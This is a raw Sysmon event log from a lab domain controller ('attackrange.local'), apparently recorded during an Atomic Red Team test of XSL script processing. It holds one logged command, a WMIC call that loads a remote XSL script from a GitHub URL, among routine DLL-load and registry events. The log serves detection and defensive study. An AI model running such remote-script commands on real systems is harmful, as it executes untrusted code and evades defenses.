12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057349644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057349642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057349641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057349640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057349639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057349638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057349637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057349636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057349635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\framedynos.dll10.0.14393.4169 (rs1_release.210107-1130)WMI SDK Provider FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationframedyn.dllMD5=F5BCBB0713FF862975B07056D25E166E,SHA256=DBB3B6E35E0FEF5B878DE8C85AF578B51C1C2DB025865354E27394AEA87824B2trueMicrosoft WindowsValid 734700x800000000000000057349634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057349633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057349631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exeMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072trueMicrosoft WindowsValid 10341000x800000000000000057349630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057349629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}36010192C:\Windows\system32\cmd.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057349628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.680{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" 734700x800000000000000057349627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057349626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 12241200x800000000000000057349624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057349623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057349622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2trueMicrosoft WindowsValid 10341000x800000000000000057349621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.658{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057349620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.658{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2118) 154100x800000000000000057349619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.642{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000057349618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.643{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057349617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.643{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A14B6B6C0DFBB03D25551F1C82F0905E,SHA256=3C8537D6660A9A795876B484287CB6396F31CA662297D1C8812352F06A159F47falsetrue 11241100x800000000000000057349616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-11-12 12:18:51.085 11241100x800000000000000057349615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-11-12 12:18:51.085 11241100x800000000000000057349614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057349613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=736B5A13E99C173BC61C0E38CC33C669,SHA256=7AA31FCF75CB3385F0D96E29D02A9F905A3957F305A9FCB915BAF39B09F71760falsetrue 11241100x800000000000000057349612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057349611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F035F3B62086B6C40BAC48D7A4C5AAF6,SHA256=0A42863BD07F4C661BF51198B5E0A77BB343DDBA13B0CF2DAAF712479BB4B78Cfalsetrue 11241100x800000000000000057349610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057349609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.627{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=947B550BCE413028F3ED64050DDCC266,SHA256=C59C6D7AF95E0085F50E471785E5BB0668BE12D1D16D9BDD3A27D08C2887D3B4falsetrue 734700x800000000000000057349608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.611{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9trueMicrosoft WindowsValid 12241200x800000000000000057349607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.586{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9trueMicrosoft WindowsValid 12241200x800000000000000057349597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.602{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 